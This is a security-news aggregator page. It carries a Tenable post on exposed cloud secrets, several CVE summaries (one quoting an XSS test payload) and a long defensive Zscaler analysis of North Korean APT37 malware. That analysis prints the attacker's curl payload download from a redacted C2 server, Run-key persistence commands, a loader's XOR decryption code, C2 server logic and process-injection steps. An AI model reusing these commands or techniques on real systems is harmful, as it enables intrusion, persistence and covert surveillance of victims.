Aggregator

Secrets at Risk: How Misconfigurations and Mistakes Expose Critical Credentials

Tenable Blog
9 months 1 week ago

Despite all the innovation in cloud computing, one persistent issue lurks in the shadows to undermine security hygiene - poor secrets management. Here, we explain compromised secrets’ impacts and causes and offer concrete risk-mitigation recommendations.

Secrets management: A cloud security challenge 

Secrets are credentials used by both human and non-human identities to access systems, applications and data. In modern cloud environments, these include API keys, tokens, access keys and sometimes even usernames and passwords. These secrets are supposed to be protected, but many teams, rushing to deploy new infrastructure and applications, unintentionally leave them exposed by placing them in automation scripts, configurations and even code repositories for convenience.
 

(Source: “Tenable Cloud Security Risk Report 2025,” June 2025)

The “Tenable Cloud Security Risk Report 2025” noted that a large percentage of organizations expose secrets through misconfigurations and mistakes, specifically:

This Tenable report primarily looked at cloud resource misconfigurations that expose secrets, but secrets are also being exposed in many other ways, including logs, public storage, and public Git repositories. While secrets exposed in Git repositories are not a new phenomenon, Verizon’s “2025 Data Breach Investigations Report” (DBIR) noted that cloud infrastructure secrets account for 15% of all secrets exposed in this way, making it the third-largest category of exposed secrets. Exposed and compromised secrets are a significant security concern, and these findings show that secrets are being mismanaged across all major cloud platforms and beyond. Unfortunately, these exposures are causing real-world impact.

The impact of compromised secrets

Compromised secrets can provide attackers with direct access to your environment. If a compromised secret has sufficient privileges, an attacker can use it to move laterally, escalate their privileges and gain access to critical assets. Therefore, targeting cloud credentials is a common initial or early step in many cloud breaches. According to the 2025 DBIR, secrets associated with cloud infrastructure represent a significant share of exposed credentials. 

Let’s look at a few relevant statistics from the 2025 DBIR:

  • Credential abuse is the leading initial access vector of breaches, at 22%.
  • System intrusion is the leading breach type, at 53%.
  • 30% of devices compromised by information stealer (infostealer) malware are enterprise-licensed devices.
  • Secrets represent 25% of the data compromised in system intrusion breaches.

Patterns Over Time in Breaches

(Source: Verizon’s “2025 Data Breach Investigations Report 2025,” April 2025 – n for 2025 dataset=12,195)

Once an attacker gains access to a cloud environment, their subsequent actions are driven by their motivation and objective. The majority of breaches are financially motivated – 85%, according to the 2025 DBIR – and ransomware deployment is the most common objective. Recent attacks carried out by these two groups bear this out:

  • Codefinger (2025): This ransomware crew, identified by Halcyon, uses compromised AWS keys to encrypt a victim’s S3 bucket data using AWS server-side encryption with customer provided keys (SSE-C). They encrypt the data using a key that is only available to the attacker, then mark the files for deletion to start the countdown for their ransom demand.
  • Storm-0501 (2024): This threat actor, identified by Microsoft, infiltrates hybrid-cloud environments. They begin by attacking on-premises environments, compromising credentials and moving laterally to the cloud, where they exfiltrate data or deploy ransomware.

These attacks highlight a worrying trend. Threat actors are pivoting to the cloud, focusing on exposed or compromised secrets and leveraging cloud-native features in their attacks. Protecting secrets must therefore be a critical component of every cloud security program.

Common causes of exposed secrets

Despite the well-known risks, secret exposure persists for several reasons, including the sheer volume of secrets created in dynamic cloud environments, a lack of visibility into who owns or has access to which secrets, and inconsistent use of cloud-native secrets managers. A lack of education around proper secrets usage and secure storage is also to blame, and this doesn’t only apply to cloud resources. (For example, Infostealer malware is designed to steal secrets from victims’ workstations). Users with long-term credentials to cloud environments who store them in the browser, text files, or anywhere else other than a password manager are another common cause of exposure.

It is common for the teams implementing secrets to do so without consulting the identity and access management (IAM) or security teams, which are responsible for the governance and security of these credentials. This contributes to the problems listed above, leading to a dispersion of secrets, a variety of methods for managing them and a lack of consistent security controls to protect them. Understanding where secrets are stored, how they are stored, how they are used and by whom is of vital importance. 

Best practices to protect secrets and mitigate the impact of abuse 
  • Involve IAM and security
    • Development, operations, and DevOps teams should involve the IAM and security teams when designing a solution to ensure secrets are properly stored and used, and that the appropriate controls are implemented.
  • Avoid using long-term credentials
    • Long-term credentials, such as passwords and keys, should be avoided wherever possible. These are typically associated with user and service accounts stored locally in the cloud provider. Instead, use federation (e.g. SAML 2.0) with temporary credentials.
  • Implement lifecycle policies
    • Lifecycle policies should be established to regularly rotate secrets, such as keys, passwords, and certificates.
  • Use secrets managers
    • Most cloud service providers offer mature, native secrets management tools that work seamlessly within their cloud (e.g., AWS Secrets Manager, GCP Secrets Manager, Azure Key Vault). Many third-party secrets management solutions also work well in cloud environments. Choose which to adopt and do so consistently and extensively.
    • End users with access to secrets should store them in a password manager approved by their organization.
  • Avoid secrets in cloud resource configuration
    • Secrets should not be hardcoded in places like bootstrap scripts, environment variables, and tags. Instead, inject secrets from a secrets manager at runtime.
  • Identify public exposure
    • Identify all public cloud storage and workloads, understand the specific access requirements, and restrict all access that is not explicitly required. Assess public and non-public resources to identify issues such as vulnerabilities, misconfigurations, malware, excessive permissions, and toxic combinations of findings that warrant prioritization. Continually monitor for changes to reduce accidental exposure of secrets and other sensitive information.
  • Inventory and classify sensitive data
    • Identify where sensitive data, including secrets, reside across your cloud footprint. Understand the access requirements for this data, then implement controls to protect it.
  • Audit and monitor access
    • Regularly review secret access logs and alert on suspicious events such as anomalous access patterns and token reuse.
  • Create an Incident Response (IR) playbook
    • Establish an IR playbook to create alerts from secrets scanning tools, monitor for anomalous access and external disclosure, identify compromised secrets, then rotate, disable, or delete them.
  • Scan infrastructure-as-code (IaC)
    • For cloud environments being built via IaC, assess the IaC in the code repository and within the pipeline to identify cloud resource misconfigurations and exposed secrets, ideally before they reach production.
  • Scan application code
    • Application code should also be scanned in the code repository and in the pipeline to identify exposed secrets.
  • Secure your cloud identities and entitlements
    • Cloud Infrastructure and Entitlement Management (CIEM) is the process of understanding which human and non-human identities have what type of access to which cloud services and resources, including other secrets. It identifies the net effective permissions of each identity and then compares that to permissions usage to identify overprivileged identities. The privileges granted to an attacker by a compromised secret can either help or hinder them. Using a CIEM, such as Tenable CIEM, to ensure identities only have the necessary permissions can help reduce the blast radius of a compromised or exposed secret.
  • Implement a cloud-native application protection platform (CNAPP)
    • A CNAPP, such as Tenable Cloud Security, replaces a patchwork of siloed cloud security products with a single cloud security solution for your multi-cloud environment. CNAPP solutions enable organizations to monitor the health of their cloud footprint on an ongoing basis.
What’s next?

Secrets management will likely evolve in the coming years as the usage of agentic artificial intelligence (AI) increases. AI agents will provision and deprovision resources rapidly and autonomously, and will have a clearly defined scope and context for the task at hand. We at Tenable envision several positive changes coming as a result of this:

  • An API for agents to dynamically generate just-in-time secrets with lifetimes measured in seconds or minutes
  • Secrets generated by identity providers or brokers, based on federated identity tokens
  • Secrets managers with an embedded policy engine for fine-grained, dynamic authorization
  • Agent-to-agent trust negotiation such that one agent can delegate a task to another and the associated secret is properly scoped and time-bound
  • Continuous scanning to identify leaked secrets then automatically revoking and reissuing them
  • Secrets replacement with an identity proof (e.g. federated identity token) and a cryptographic attestation (e.g. mutual Transport Layer Security, or TLS)

Yet, we expect that secrets will continue to be an issue due to factors including: 

  • Legacy systems: Older apps will still rely on configuration files and static passwords for years to come.
  • Human factors: Developers will still make mistakes such as hardcoding keys in code, pasting them in Slack, uploading them to GitHub, etc.
  • Third-party ecosystems: APIs, SaaS tools, and IoT devices often only support static keys.
  • Cost and complexity: Not every company can afford to re-architect for ephemeral, secretless patterns.
Conclusion

Secrets are essential to running modern cloud environments - but when they’re mismanaged or misconfigured, they become one of the easiest ways for attackers to access an environment or move laterally within it. As our research and breach data show, these exposures are alarmingly common and attackers are using them to great effect - often without the need for complex attacks.

Tenable Cloud Security equips your organization with the visibility, automation, and context necessary to reduce your cloud exposure. From detecting exposed secrets to prioritizing the most impactful misconfigurations, vulnerabilities, and toxic combinations, we help your teams reduce risk — without slowing down innovation.
 

(Source: Tenable Cloud Security: Dashboard widgets showing exposed secrets and toxic combinations of findings)

Learn more:
Ryan Bragg

BSidesSF 2025: Sharing Vulnerabilities

Security Boulevard
9 months 1 week ago

Creator, Author and Presenter: Clint Gibler

Our deep appreciation to Security BSides - San Francisco and the Creators, Authors and Presenters for publishing their BSidesSF 2025 video content on YouTube. Originating from the conference’s events held at the lauded CityView / AMC Metreon - certainly a venue like no other; and via the organization's YouTube channel.

Additionally, the organization is welcoming volunteers for the BSidesSF Volunteer Force, as well as their Program Team & Operations roles. See their succinct BSidesSF 'Work With Us' page, in which, the appropriate information is to be had!

Permalink

The post BSidesSF 2025: Sharing Vulnerabilities appeared first on Security Boulevard.

Marc Handelman

Tech Debt: Why Fixing the Foundation Comes Before Building the Castle

Security Boulevard
9 months 1 week ago

42% of developer time goes to fixing tech debt instead of building features. Knight Capital lost $460M in one day due to unaddressed code issues. Here's why smart companies fix P0/P1 problems first, and the framework that helped me scale startups without constant firefighting.

The post Tech Debt: Why Fixing the Foundation Comes Before Building the Castle appeared first on Security Boulevard.

Deepak Gupta - Tech Entrepreneur, Cybersecurity Author

CVE-2025-40641 | Multi-Purpose Inventory Management System Non-defining Query update product_name cross site scripting (EUVD-2025-27122)

Vuldb Updates
9 months 1 week ago
A vulnerability, which was classified as problematic, has been found in Multi-Purpose Inventory Management System Non-defining. The affected element is an unknown function of the file /Controller_Products/update of the component Query Handler. This manipulation of the argument product_name causes cross site scripting. This vulnerability is registered as CVE-2025-40641. Remote exploitation of the attack is possible. No exploit is available.
vuldb.com

Venezuela’s Maduro Says Huawei Mate X6 Gift From China is Unhackable by U.S. Spies

Cyber Security News
9 months 1 week ago

In Caracas this week, President Nicolás Maduro unveiled the Huawei Mate X6 gifted by China’s Xi Jinping, declaring the device impervious to U.S. espionage efforts. The announcement coincides with heightened tensions between Washington and Beijing, as the United States enforces stringent controls on Chinese telecom equipment. Beyond its political symbolism, the Mate X6 has become […]

The post Venezuela’s Maduro Says Huawei Mate X6 Gift From China is Unhackable by U.S. Spies appeared first on Cyber Security News.

Tushar Subhra Dutta

CVE-2025-10117 | SourceCodester Simple To-Do List System 1.0 Add New Task /fetch_tasks.php cross site scripting

VulDB Recent Entries
9 months 1 week ago
A vulnerability categorized as problematic has been discovered in SourceCodester Simple To-Do List System 1.0. Impacted is an unknown function of the file /fetch_tasks.php of the component Add New Task. Executing manipulation with the input <script>alert('XSS')</script> can lead to cross site scripting. This vulnerability is handled as CVE-2025-10117. The attack can be executed remotely. Additionally, an exploit exists.
vuldb.com

CVE-2025-36855 | Microsoft .NET up to 6.0.35 DiaSymReader.dll buffer over-read

VulDB Recent Entries
9 months 1 week ago
A vulnerability has been found in Microsoft .NET up to 6.0.35 and classified as critical. Affected by this vulnerability is an unknown functionality in the library DiaSymReader.dll. The manipulation leads to buffer over-read. This vulnerability only affects products that are no longer supported by the maintainer. This vulnerability is documented as CVE-2025-36855. The attack can be initiated remotely. There is not any exploit available. The affected component should be upgraded.
vuldb.com

CVE-2025-36854 | Microsoft .AspNetCore.App.Runtime.osx-x64 up to 6.0.36 HTTP3 Response Body use after free

VulDB Recent Entries
9 months 1 week ago
A vulnerability, which was classified as critical, was found in Microsoft .NET 6.0, .AspNetCore.Identity, .AspNetCore.App.Runtime.win-arm, .AspNetCore.App.Runtime.win-arm64, .AspNetCore.App.Runtime.win-x64, .AspNetCore.App.Runtime.win-x86, .AspNetCore.App.Runtime.linux-arm, .AspNetCore.App.Runtime.linux-arm64, .AspNetCore.App.Runtime.linux-musl-arm, .AspNetCore.App.Runtime.linux-musl-arm64, .AspNetCore.App.Runtime.linux-musl-x64, .AspNetCore.App.Runtime.linux-x64, .AspNetCore.App.Runtime.osx-arm64 and .AspNetCore.App.Runtime.osx-x64 up to 6.0.36. Affected is an unknown function of the component HTTP3 Response Body Handler. Executing manipulation can lead to use after free. This vulnerability only affects products that are no longer supported by the maintainer. This vulnerability is registered as CVE-2025-36854. It is possible to launch the attack remotely. No exploit is available.
vuldb.com

APT37 Targets Windows with Rust Backdoor and Python Loader

Security Boulevard
9 months 1 week ago

IntroductionAPT37 (also known as ScarCruft, Ruby Sleet, and Velvet Chollima) is a North Korean-aligned threat actor active since at least 2012. APT37 primarily targets South Korean individuals connected to the North Korean regime or involved in human rights activism, leveraging custom malware and adopting emerging technologies.In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including a Rust-based backdoor that ThreatLabz dubbed Rustonotto (also known as CHILLYCHINO), a PowerShell-based malware known as Chinotto, and FadeStealer. Rustonotto is a newly identified backdoor in use since June 2025. Chinotto is a well-documented PowerShell backdoor that has been in use since 2019. FadeStealer, first discovered in 2023, is a surveillance tool that records keystrokes, captures screenshots and audio, monitors devices and removable media, and exfiltrates data via password-protected RAR archives.In this blog post, Zscaler ThreatLabz delves into the tactics and tools used by APT37. The technical analysis explores APT37's sophisticated tactics, including spear phishing, Compiled HTML Help (CHM) file delivery, and Transactional NTFS (TxF) for stealthy code injection.Key TakeawaysAPT37 is a North Korean-aligned threat actor active since at least 2012 that primarily targets individuals connected to the North Korean regime or involved in human rights activism.In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including the Rust-based backdoor we named Rustonotto, the PowerShell-based Chinotto malware, and FadeStealer.FadeStealer, first identified in 2023, is a surveillance tool designed to log keystrokes, capture screenshots and audio, track devices and removable media, and exfiltrate data through password-protected RAR archives. FadeStealer leverages HTTP POST and Base64 encoding for communication with its command-and-control (C2) server.APT37 utilizes Windows shortcut files and Windows help files as initial infection vectors.Rustonotto, active since June 2025, is a Rust-compiled malware, representing the first known instance of APT37 leveraging Rust-based malware to target Windows systems.Using simple backdoors in the initial stage, the threat actor deployed FadeStealer via a Python-based infection chain.OverviewS2W published a comprehensive report on the same threat actor, detailing PubNub-based communication malware and the deployment of VCD ransomware. In this blog post, ThreatLabz expands on these findings and highlights the infection chain observed, along with the C2 operations that orchestrate the full tradecraft of this threat actor.ThreatLabz’s latest findings suggest that APT37 utilized the Rust programming language to create a lightweight backdoor we named Rustonotto, which has basic functionality for executing Windows commands and sending the results to a threat actor-controlled server. While Rustonotto may appear simplistic, the use of Rust highlights the group's ongoing effort to adopt modern languages and potentially support multi-platform attacks. APT37 also employed a Python-based loader implementing the Process Doppelgänging code injection technique to deploy a custom-built stealer designed for data exfiltration.ThreatLabz collaborated with the Korea National Police Agency (KNPA) by providing technical analysis to support their investigation of APT37.Technical Analysis Attack chainThreatLabz reconstructed the APT37 infection chain that begins with an initial compromise via a Windows shortcut or a Windows help file, followed by Chinotto dropping FadeStealer through a sophisticated infection process. The attack chain is depicted in the figure below.Figure 1: Full infection chain involving Chinotto, Rustonotto, and FadeStealer.Windows shortcut and RustonottoIn one campaign, APT37 utilizes a Windows shortcut file. When this shortcut file (MD5: b9900bef33c6cc9911a5cd7eeda8e093) is launched, a malicious PowerShell script, Chinotto, is invoked that extracts an embedded decoy and payload using predefined markers. The steps outlined below detail the infection process initiated when the victim executes Chinotto.Scans %temp% and the current working directory for its own Windows shortcut file, validating its exact size (6,032,787 bytes) to ensure the correct file is processed.Reads the Windows shortcut, converts the byte values to ASCII, and extracts two hex-encoded payloads delimited by the markers AEL (first payload start), BEL (second payload start), and EOF (end of file marker).Converts the first hex payload to binary and writes it as C:\ProgramData\NKView.hwp, then launches it as a decoy document.Decodes the second payload and writes it as C:\ProgramData\3HNoWZd.exe, which functions as the main executable.Creates a scheduled task named MicrosoftUpdate, configured to execute 3HNoWZd.exe every 5 minutes using schtasks.The decoy document is a Hangul Word Processor (HWP) file titled “Two Perspectives on North Korea in South Korean Society”, which was last modified on June 11, 2025.Figure 2: Example decoy document dropped by an APT37 Windows shortcut file.The dropped payload is Rustonotto, which is a Rust-compiled binary (MD5 7967156e138a66f3ee1bfce81836d8d0). Rustonotto receives Base64-encoded Windows commands and returns the execution results also in a Base64-encoded format. The steps below illustrate the sequence of Rustonotto’s behavior, specifically focusing on its C2 communication.Establishes an HTTP connection to the C2 server with the U= HTTP query parameter.Makes HTTP requests to the C2 server to fetch commands.Executes the commands received.Captures the command output and sends the result back to the C2 server with the R= HTTP query parameter.Windows help file and PowerShell-based payloadIn another campaign, the threat actor used a Windows help file (CHM) to deliver malware, a method that ThreatLabz has observed APT37 use before. In this case, the victim was sent a RAR file named 2024-11-22.rar. Inside the RAR archive were two files: a password-protected ZIP archive called KT그룹 채용 (translated as KT Job Description) and a malicious Windows help file named Password.chm. (which was disguised as a document containing the password for the ZIP archive). The malicious CHM file, when opened, creates a registry value under the Run key to trigger the download and execution of an HTML Application (HTA) file from the threat actor’s server each time the current user logs on. The example below shows how the CHM file is configured to perform this action: The HTA file (1.html) downloaded by the CHM contains a malicious PowerShell script that acts as a backdoor, allowing the threat actor to control the infected computer remotely. The backdoor known as Chinotto is capable of performing various tasks, such as transferring files, executing commands, modifying the registry, creating scheduled tasks, and more. When Chinotto launches, it creates a unique victim identifier by combining the computer name and the username, which Chinotto uses when communicating with the C2 server. Chinotto connects to the same C2 server URL previously associated with Rustonotto.To avoid running the malware more than once on the same machine, Chinotto generates a file named %TEMP%\jMwVrHdPtpv as an execution marker. Every 5 seconds, Chinotto checks the threat actor’s C2 server for new instructions via HTTP POST requests, sending the victim ID (formatted as U=[victim ID]). Chinotto then receives commands from the server, which are Base64 decoded, and executed on the infected system. The table below shows the commands supported by Chinotto, along with their description.CommandsDescriptionFINFOCollects file information (name, size, timestamps, path) from a specified directory, saves it to a CSV file, and uploads the CSV to the C2 server.DIRUPCompresses the contents of a specified directory into a ZIP archive and uploads the ZIP to the C2 server.SFILEUploads a specified file to the C2 server.DOWNFDownloads a file from a given URL and saves it to a specified path.CURLCUses curl to download a file from a URL and saves it to a specified path.REGEDModifies the Windows registry at a specified location, setting the name and value.TASKACreates a scheduled task to run a specified command at regular intervals.ZIPEXExtracts the contents of a ZIP archive to a specified destination.RENAMRenames a specified file or directory.DELETDeletes a specified file or directory.Table 1: Commands supported by the Chinotto backdoor.When Chinotto completes execution, it sends a Base64-encoded done message back to the C2 server with the R= HTTP query parameter.Transacted injectionThe threat actor's hands-on-keyboard activities with the implanted Chinotto variant involved delivering malicious payloads packaged in Microsoft Cabinet (.CAB) files. These payloads, equipped with Python-based launchers, were extracted and executed upon delivery. The commands used to deliver and execute the payloads are outlined in the table below.Delivered commandsDescriptioncurl http://[redacted]/images/test/wonder.dat -o "c:\programdata\wonder.cab"Fetches the Microsoft Cabinet (CAB) file payload from the C2 server.expand c:\programdata\wonder.cab -F:* c:\programdataExtracts the contents of the .CAB file to the specified directory.del /f /q c:\programdata\wonder.cabDeletes the .CAB file to remove evidence.reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v TeleUpdate /d "c:\programdata\tele_update\tele_update.exe c:\programdata\tele_update\tele.conf c:\programdata\tele_update\tele.dat" /fAdds a registry entry to enable automatic execution at system startup or login.c:\programdata\telegram_update\tele_update.exe c:\programdata\telegram_update\tele.conf c:\programdata\telegram_update\tele.datLaunches FadeStealer with its associated configuration and data files.Table 2: Example APT37 commands executed to deliver FadeStealer.Each file executed during the threat actor’s hands-on-keyboard activity includes three components: A legitimate Python module (tele_update.exe).A compiled Python module (tele.conf) that decrypts and loads FadeStealer from a file named tele.dat.The FadeStealer payload (tele.dat), Base64-encoded and XOR encrypted.The compiled Python module, created on 2025-04-01 05:42:03, is internally named TransactedHollowing.py, suggesting the use of a technique for stealthily injecting and executing arbitrary code within a legitimate Windows process.The script is designed to process a single input file containing a Base64-encoded payload. The script decodes the payload and applies a custom XOR-based decryption routine to extract a Windows executable. The decrypted executable is intended for injection into a target process. The following code demonstrates the decryption routine used to unpack the payload.def decrypt_custom_encoded_file(file_path):
try:
# Open the file in binary mode and read its content
with open(file_path, "rb") as file:
encoded_data = file.read()

# Decode the content from base64
decoded_data = base64.b64decode(encoded_data)

# Read offset and update it
offset = decoded_data[0]
offset += 1

# Get key length and update offset
key_length = decoded_data[offset]
offset += 1

# Extract the XOR key
xor_key = decoded_data[offset : offset + key_length]
offset += key_length

# Decrypt the rest of the data using XOR with the key
decrypted = bytes([
decoded_data[i] ^ xor_key[(i - offset) % key_length]
for i in range(offset, len(decoded_data))
])

return decrypted After unpacking the original payload, the Python script employs the Process Doppelgänging technique to inject the payload into a legitimate Windows process. The technique involves the following steps:Transacted file creation and section object setupThe script uses Windows Transactional NTFS (TxF) APIs (e.g., CreateFileTransactedW) to create a new file within a transaction context.The decrypted Portable Executable (PE) payload is written to the transacted file.The function NtCreateSection is called to create a memory section object, using the transacted file as the backing store for the payload's memory.The transaction is rolled back (RollbackTransaction), while preserving the section object in memory.The temporary file handle is closed, and the file is deleted, leaving no trace of the payload on disk.Suspended process creationThe script randomly selects a legitimate Windows system executable from a predefined list. Examples include: calc.exe, msinfo32.exe, svchost.exe, GamePanel.exe, UserAccountControlSettings.exe, and control.exe.The script creates a new process associated with the chosen executable in a suspended state.Section mapping, context manipulation, and executionThe section object containing the payload is mapped into the address space of the suspended process using NtMapViewOfSection.The script modifies the thread context of the suspended process (via GetThreadContext / SetThreadContext or their Wow64 equivalents) to redirect execution to the payload's entry point.The Process Environment Block (PEB) of the target process is updated to reflect the new image base address associated with the injected payload.The main thread of the process is resumed (ResumeThread), triggering the execution of the injected payload.The decrypted malware is FadeStealer, the same data-theft tool previously documented by AhnLab. FadeStealer periodically gathers files from the infected system, compresses them into password-protected RAR archives, and transmits them to a C2 server. When launched, FadeStealer creates working directories under the %TEMP%\VSTelems_Fade\ folder. FadeStealer has two main functions: automatically exfiltrating sensitive files and sending specific files as directed by commands specified by the threat actor. FadeStealer file stealing commandsOnce connected to the C2 server, FadeStealer receives Base64-encoded commands specifying a file path and a search pattern, separated by the | character. These commands direct the malware to gather target files based on the criteria provided. After collecting the files, FadeStealer creates a timestamped RAR archive (e.g., data_YYYY_MM_DD-HH_MM_SS.rar) and sends it back to the C2 server. Some example commands are listed below:CommandDescription C:\Users\|*.docCollect all Word documents from the Users directory.C:\Documents\|*.*Collect all files from the Documents folder.D:\|*.pdfCollect all PDF files from the D: drive.Table 3: Example commands supported by FadeStealer.FadeStealer surveillanceIn surveillance mode, FadeStealer operates multiple threads, each dedicated to monitoring and collecting specific types of data from the infected system. These threads function independently to capture keystrokes, screenshots, audio recordings, and file content from connected devices.In the table below, the capabilities, collection frequency, file naming patterns, and storage locations of the malware are listed.CapabilitiesFrequencyFiles CollectedDirectoryRecords all keystrokesReal-timekey_YYYY_MM_DD.log%TEMP%\VSTelems_Fade\NgenPdbk\Captures screen imagesEvery 30 secYYYY_MM_DD-HH_MM_SS.jpg%TEMP%\VSTelems_Fade\NgenPdbc\Records microphone audio5-min sessionsYYYY_MM_DD-HH_MM_SS.wav%TEMP%\VSTelems_Fade\NgenPdbm\Monitors for USB devicesEvery 1 hourusb_YYYY_MM_DD-HH_MM_SS.rar%TEMP%\VSTelems_FadeOut\Monitors cameras/portable devicesEvery 1 hour[DeviceName]_YYYY_MM_DD-HH_MM_SS.rar%TEMP%\VSTelems_FadeIn\Table 4: Surveillance capabilities and corresponding files associated with FadeStealer. FadeStealer compiles all the collected data into a RAR archive every hour, using a naming format like watch_YYYY_MM_DD-HH_MM_SS.rar. This archive includes files stored in the main directory (%TEMP%\VSTelems_Fade\), which contain keylogging data, screenshots, audio recordings, and captured files. A separate thread is responsible for uploading these archives to the C2 server.To ensure timely exfiltration, another thread actively monitors and identifies archived RAR files every 10 seconds, sending them to the C2 server upon detection.In the table below, the source directories, archive types, and the contents of the collected data are outlined.Source DirectoryArchive TypesContent%TEMP%\VSTelems_Fade\watch_YYYY_MM_DD-HH_MM_SS.rarHourly surveillance data consolidated (keylogging, screenshots, audio).%TEMP%\VSTelems_FadeOut\usb_YYYY_MM_DD-HH_MM_SS.rarUSB device contents collected when inserted.%TEMP%\VSTelems_FadeIn\[DeviceName]_YYYY_MM_DD-HH_MM_SS.rarMTP-enabled devices such as smartphones, cameras, and media player contents gathered during monitoring.Any locationdata_YYYY_MM_DD-HH_MM_SS.rarFiles collected via remote commands.Table 5: Filenames and paths used for surveillance by FadeStealer.When sending files, FadeStealer uses HTTP POST requests with multipart form data, specifying myboundary as the boundary name. Additionally, when creating a RAR archive, FadeStealer utilizes the hardcoded password NaeMhq[d]q to encrypt the RAR content and employs a custom RAR.exe tool extracted from its embedded resources.C2 serverThe threat actor leveraged vulnerable web servers to act as C2 servers for managing malware operations. The C2 PHP script used by APT37 is a lightweight and file-based backend, facilitating communication between the threat actor and the malware implants. The C2 server enables command delivery, result collection, and file uploads, all organized within a single JSON file (info).Using this simple yet effective script, the threat actor controlled the entire suite of malware tools used in the campaign. This included Rustonotto, Chinotto, and FadeStealer, all of which utilized the same Base64-encoded format for communication. While some malware variants featured slight differences in command structures, the C2 server PHP script provided unified and streamlined control over the entire malware toolset. The figure below illustrates how the C2 server functioned as a central hub for delivering commands, collecting results, and handling uploads across the different malware components in the campaign.Figure 3: APT37 C2 server architecture for Rustonotto, Chinotto, and FadeStealer.The APT37 C2 server maintains two arrays: a parent array for storing results received from the malware implant and a child array for storing commands issued by the threat actor. The code sample below demonstrates how the APT37 C2 server initializes its operation.…
if (!file_exists("info"))
{
   file_put_contents("info", '{"parent" : [{"id" : "", "text" : ""}], "child" : [{"id" : "", "text" : ""}]}');
}
$jsonStored = '';
$jsonStored = json_decode(file_get_contents("info"));
…The APT37 C2 server handles incoming HTTP requests differently depending on whether they originate from the threat actor or the malware implant. Requests are processed based on specific types and associated parameters, as outlined in the table below.Request TypeParameterDescriptionGET/POSTU=parentWhen the threat actor sends the query string U=parent, the C2 sends back the entire parent array, containing results from the clients. After delivering the response, the C2 resets the parent array to empty.GETU=&C=When the threat actor issues a command for a specific client, the Base64-encoded command is decoded and stored in the child array under the client’s ID. If the entry already exists, it is updated; otherwise, a new entry is created. The command is delivered to the client during its next poll and then cleared from the store.POSTU=&R=When a client sends back a result, the result is Base64-decoded and stored in the parent array under the client’s ID. If the entry already exists, it is updated; otherwise, a new entry is created. The threat actor can later retrieve these results using the query string U=parent.POSTU=&_file=When a client uploads a file, it is saved in the current directory with a filename prefixed by the client’s ID. The final filename format is _. If the file already exists, the data is appended.GET/POSTU=When a client polls for commands without sending a result or file, the script checks the child array for pending commands. If a command is found, it is delivered and cleared. If no command exists, the script checks the parent array. If no result is present, it responds with a default handshake message ("SEVMTw==", Base64 for "HELLO").Table 6: APT37 C2 server HTTP parameters and their corresponding purposes.The threat actor retrieves exfiltrated files from the compromised machine by issuing a direct GET request to the C2 server, leveraging prior knowledge of the client ID and the specific file name.
Victim ProfileOur findings revealed that several victims of this attack were located in South Korea. While the exact identities of the victims remain unclear due to limited available information, they do not appear to be associated with enterprises or government organizations. Based on the decoy content employed in the attack, ThreatLabz assesses with medium confidence that the intended targets include individuals linked to the North Korean regime or involved in South Korean political and/or diplomatic affairs.ConclusionAPT37 continues to prove its adaptability and proficiency by utilizing advanced tools and tactics to achieve its objectives. By incorporating new technologies alongside refined social engineering techniques, the group is able to effectively exfiltrate sensitive information and conduct targeted surveillance on individuals of interest. This malware cluster leveraged by APT37 has demonstrated persistent activity over the years and continues to undergo regular improvements.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to APT37's campaign at various levels.  The figure below depicts the Zscaler Cloud Sandbox, showing detection details for this threat.Figure 4: Zscaler Cloud Sandbox report for FadeStealer.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to this threat at various levels with the following threat names:Win32.Backdoor.ChinottoWin32.Trojan.Apt37.LZWin32.Downloader.FadeStealerIndicators Of Compromise (IOCs)MD5File nameb9900bef33c6cc9911a5cd7eeda8e093N/A7967156e138a66f3ee1bfce81836d8d03HNoWZd.exe.bin77a70e87429c4e552649235a9a2cf11awonder.dat04b5e068e6f0079c2c205a42df8a3a84tele.confd2b34b8bfafd6b17b1cf931bb3fdd3dbtele.dat3d6b999d65c775c1d27c8efa615ee5202024-11-22.rar89986806a298ffd6367cf43f36136311Password.chm4caa44930e5587a0c9914bda9d240acc1.html MITRE ATT&CK FrameworkIDTacticDescriptionT1566.001Phishing: Spearphishing AttachmentThe threat actor delivers a malicious archive file to victims via spear phishing.T1059.003Command and Scripting Interpreter: Windows Command ShellThe Windows commands are launched by the CHM file when the Chinotto malware is delivered to the victim.T1059.007Command and Scripting Interpreter: JavaScriptThe JavaScript embedded HTA file is launched at the initial stage of the infection.T1053.005Scheduled Task/Job: Scheduled TaskA Windows Task Scheduler entry named MicrosoftUpdate was created for persistence using a malicious shortcut fileT1204.001User Execution: Malicious LinkThe malicious Windows shortcut file was delivered to the victim.T1547.001Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderThe malicious CHM file creates a Run registry named OnedriveStandaloneUpdater for persistence.T1055.013Process Injection: Process DoppelgängingUsing Python code, the malware injects malicious code into the legitimate process using Windows Transactional NTFS (TxF).T1036.003Masquerading: Rename Legitimate UtilitiesThe legitimate Python module was renamed as tele_update.exe.T1036.004Masquerading: Masquerade Task or ServiceThe malware creates Windows services or registry keys that impersonate legitimate services, such as OneDrive or Windows Update.T1218.005System Binary Proxy Execution: MshtaThe malware exploits mshta.exe to execute malicious .hta files as a proxy.T1056.001Input Capture: KeyloggingFadeStealer collects the user's key strokes.T1113Screen CaptureFadeStealer takes screenshots of the victim’s screen.T1123Audio CaptureFadeStealer records microphone audio.T1025Data from Removable MediaFadeStealer collects files from connected removable media devices.T1560.001Archive Collected Data: Archive via UtilityFadeStealer uses an embedded RAR utility to collect and compress data for exfiltration.T1071.001Application Layer Protocol: Web ProtocolsRustonotto, Chinotto, and FadeStealer use HTTP communication for backdoor operations.T1132.001Data Encoding: Standard EncodingRustonotto and Chinotto use Base64 encoding when sending data.T1041Exfiltration Over C2 ChannelFadeStealer exfiltrates collected data through the C2 channel.

The post APT37 Targets Windows with Rust Backdoor and Python Loader appeared first on Security Boulevard.

Seongsu Park (Senior Security Researcher)

Managed ad